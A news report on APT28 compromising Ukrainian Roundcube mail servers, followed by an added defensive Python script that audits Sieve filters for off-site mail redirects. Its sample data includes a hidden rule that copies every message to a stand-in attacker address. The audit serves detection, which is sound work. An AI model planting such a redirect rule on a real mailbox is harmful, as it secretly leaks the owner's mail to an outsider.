Russian-Speaking Hackers Target Ukrainian Organizations
Researchers from Recorded Future and CERT-UA have reported that the Russian-speaking hacking group APT28 (aka Fancy Bear, BlueDelta, Sednit and Sofacy) has been targeting Roundcube mail servers belonging to several Ukrainian organizations, including government ones.
The hackers have been using spear-phishing lure emails themed around the special military operations to entice victims into opening malicious messages. These messages exploit known, older vulnerabilities in Roundcube (CVE-2020-35730, CVE-2020-12641 and CVE-2021-44026) to compromise unpatched servers.
Malicious Scripts Deployed on Servers
Once a server was compromised, the attackers deployed malicious scripts on it that redirected incoming messages from victims to an email address controlled by the attackers themselves. These scripts were also used to find and steal victims' address books, session cookies and other information stored in the Roundcube database.
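A defender's first question after reading the paragraph above is how to find silent mail redirection on their own Roundcube/IMAP servers. The following is an added example, not code from the report or from CERT-UA: it audits per-user Sieve filter scripts and flags any `redirect` action whose destination lies outside the organization's trusted domains. It assumes that redirection was implemented through server-side Sieve rules (the article does not say how the scripts redirected mail); the sample scripts, usernames and domains are constructed for illustration.

```python
import re

# Constructed sample Sieve scripts keyed by mailbox user (not taken from the report).
# "bob" carries a silent copy-and-forward rule to an outside address, the pattern a
# mail-redirection implant would leave behind if it used Sieve filters (assumption).
SAMPLE_SIEVE = {
    "alice": 'require ["fileinto"];\n'
             'if header :contains "subject" "invoice" { fileinto "Finance"; }\n',
    "bob":   'require ["copy"];\n'
             '# looks harmless, but forwards every message off-site\n'
             'redirect :copy "collector@example-attacker.test";\n'
             'keep;\n',
    "carol": 'redirect "carol.backup@example.gov.ua";\n',
}

# Domains that legitimate forwarding rules are allowed to point at (constructed).
TRUSTED_DOMAINS = {"example.gov.ua"}

# Sieve "redirect" action (RFC 5228), optionally with the ":copy" extension (RFC 3894).
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s*:copy)?\s*"([^"]+)"', re.IGNORECASE)


def strip_comments(script: str) -> str:
    """Remove Sieve '#' line comments and '/* */' block comments so that
    commented-out text is not mistaken for a live redirect."""
    script = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
    return re.sub(r"#[^\n]*", "", script)


def redirect_targets(script: str) -> list[str]:
    """Return every address a script's redirect actions deliver mail to."""
    return REDIRECT_RE.findall(strip_comments(script))


def is_external(address: str, trusted: set[str]) -> bool:
    """True when the address's domain is not in the trusted set."""
    domain = address.rsplit("@", 1)[-1].strip().lower()
    return domain not in trusted


def audit_sieve_scripts(scripts: dict[str, str], trusted: set[str]) -> dict[str, list[str]]:
    """Map each user to the external redirect targets found in their script.
    Users whose scripts only file or redirect internally are omitted."""
    findings: dict[str, list[str]] = {}
    for user, script in scripts.items():
        external = [a for a in redirect_targets(script) if is_external(a, trusted)]
        if external:
            findings[user] = external
    return findings


if __name__ == "__main__":
    for user, targets in audit_sieve_scripts(SAMPLE_SIEVE, TRUSTED_DOMAINS).items():
        print(f"{user}: mail redirected off-site to {', '.join(targets)}")
```

In practice the script bodies would be read from the Sieve storage directory of the IMAP server (or fetched over ManageSieve as an admin), and the audit run on a schedule so that a newly added external redirect is noticed within hours rather than months; the address book and session tables of the Roundcube database deserve the same periodic review for unexpected access.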
Military Intelligence Gathering
The researchers believe that the infrastructure used by the hackers in these attacks has been active since around November 2021, and that APT28’s activities are aimed at “gathering military intelligence.”